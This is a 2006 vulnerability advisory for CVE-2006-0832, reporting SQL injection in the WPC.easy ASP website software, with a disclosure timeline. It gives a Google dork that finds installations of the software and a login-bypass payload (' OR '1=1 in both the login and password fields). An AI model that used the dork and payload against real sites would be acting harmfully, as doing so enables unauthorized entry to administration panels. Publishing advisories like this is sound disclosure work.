Bug: SLQ Injection vulnerability in WPCeasy (WLB-2006020062 Ascii Version)

	WLB2
Full List

Bugs

Bogus

Tricks

Exploits

	CVE MAP
Full List

Vendors

Products

	Tools
CWE Dictionary

Google Hacking

	Search
General

CVE

CWE

	RSS
Full List

Bugs

Exploits

Dorks

	Information
Our services

Add note

About



	Submit
To add a note, use this form or send email to submit@cxsecurity.com When contacting via email, we recommend coded messages. Get our PGP public key

Topic:	SLQ Injection vulnerability in WPCeasy
Credit:	murfie gmail com
Date:	2006.02.22
CWE:	N/A
CVE:	CVE-2006-0832 (Show details) Use CVE to see details like: - CVSS2, - Affected Software, - References

Risk	Local		Remote
Medium	No		Yes

My first vulnerability report :)

Description:

"WPC.easy" is a database generated website with a dynamic on-line administration suite which allows for
product updates, editing, deleting, image upload and price changes. "WPC.easy" is powered by a Secure
Database.

vendor: http://www.webpagecity.com/wpceasy/wpceasy.asp

Quote:
"WPC.easy" is an interactive self maintained web site, developed with ASP technology. The web site has a
secure, password protected dynamic administration interface.

Secure ?? Woops.. :)

googledork:

"Thank You for using WPCeasy"
http://www.google.com/search?q=%22Thank+You+for+using+WPCeasy%22&filter=
0

SLQ injection:

login: ' OR '1=1
password: ' OR '1=1

Status:

28 jan 2006: vulnerability found
29 jan 2006: vendor notified
30 Jan 2006: vendor responded
18 Feb 2006: still no fix, posted to buqtraq

Greetings to L0om for encouraging me to post this here and everyone at JIHS.

[ ASCII VERSION ]

Bug: SLQ Injection vulnerability in WPCeasy (WLB-2006020062 Ascii Version)

use this form